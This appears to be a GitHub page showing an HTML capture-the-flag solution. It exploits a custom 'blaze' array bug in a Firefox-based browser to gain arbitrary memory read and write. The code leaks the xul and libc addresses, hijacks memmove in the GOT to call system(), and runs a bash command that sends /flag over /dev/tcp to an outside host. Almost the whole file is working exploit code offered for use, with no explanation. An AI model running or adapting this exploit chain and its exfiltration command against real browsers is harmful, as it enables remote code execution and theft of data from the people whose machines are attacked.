Permalink
Cannot retrieve contributors at this time
| <!DOCTYPE html> | |
| <html> | |
| <!-- flag{fire_just_makes_the_blaze_better} --> | |
| <head> | |
| <meta charset="utf-8"> | |
| <script src="utils.js"></script> | |
| <title></title> | |
| <script type="text/javascript"> | |
| function exploit() { | |
| arr = [0x11223344]; | |
| ab = new ArrayBuffer(32); | |
| overwrite_len = new Uint32Array(ab); | |
| overwrite_len[0] = 0x77777777; | |
| victim_ab = new ArrayBuffer(32); | |
| victim = new Uint32Array(victim_ab); | |
| victim[0] = 0x88888888; | |
| log("starting"); | |
| arr.blaze(); | |
| arr[7] = 0x10000; | |
| var ptr_overwrite_idx = -1; | |
| for (var i = 0; i < 1000; i++) { | |
| if (overwrite_len[i] == 0x88888888) { | |
| overwrite_len[i] = 0x98888888; | |
| ptr_overwrite_idx = i; | |
| break; | |
| } | |
| } | |
| log(`ptr_overwrite_idx ${ptr_overwrite_idx} `); | |
| if (ptr_overwrite_idx == -1) { | |
| return; | |
| } | |
| // from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js | |
| memory = { | |
| prepare: function(addr, typed_array) { | |
| x = new Int64(addr); | |
| x.rshift(); | |
| overwrite_len[ptr_overwrite_idx - 8] = x.lower(); | |
| overwrite_len[ptr_overwrite_idx - 7] = x.upper(); | |
| return new typed_array(victim_ab); | |
| }, | |
| write: function(addr, data) { | |
| view = memory.prepare(addr, Uint32Array); | |
| x = new Int64(data) | |
| view[0] = x.lower(); | |
| view[1] = x.upper(); | |
| }, | |
| read: function(addr) { | |
| view = memory.prepare(addr, Uint32Array); | |
| return new Int64(view[0] + 256 ** 4 * view[1]); | |
| }, | |
| readWithTag: function(addr) { | |
| view = memory.prepare(addr, Uint32Array); | |
| return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff)); | |
| } | |
| } | |
| function leak_native(nat_func) { | |
| victim_ab.yolo = nat_func; | |
| victim_ab.haha = 0x13391339; | |
| slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12]; | |
| slots_0 = (memory.readWithTag(slots).toInt()); | |
| return memory.read(slots_0 + 5 * 8).toInt() | |
| } | |
| nat_func = leak_native(Date.now); | |
| log("[+] Date.now @ " + nat_func.toString(16) + "\n"); | |
| xul_base = nat_func - 0x49c7ab0; | |
| memmove_got = xul_base + 0x0000818b220; | |
| dup_got = xul_base + 0x0000818b738; | |
| dup_libc = memory.read(dup_got); | |
| libc_base = dup_libc - 0xf7940; | |
| system_libc = libc_base + 0x45390; | |
| log("[+] xul base @ " + xul_base.toString(16), true); | |
| log("[+] memmove@got @ " + memmove_got.toString(16), true); | |
| log("[+] libc_base@libc_@_" + libc_base.toString(16), true); | |
| log("[+] system@libc @ " + system_libc.toString(16), true); | |
| var target = new Uint8Array(100); | |
| var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &"; | |
| for (var i = 0; i < cmd.length; i++) { | |
| target[i] = cmd.charCodeAt(i); | |
| } | |
| target[cmd.length] = 0; | |
| memmove_backup = memory.read(memmove_got); | |
| memory.write(memmove_got, system_libc); | |
| target.copyWithin(0, 1); | |
| memory.write(memmove_got, memmove_backup); | |
| } | |
| exploit(); | |
| </script> | |
| </head> | |
| <body> | |
| </body> | |
| </html> | |
| <!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 --> |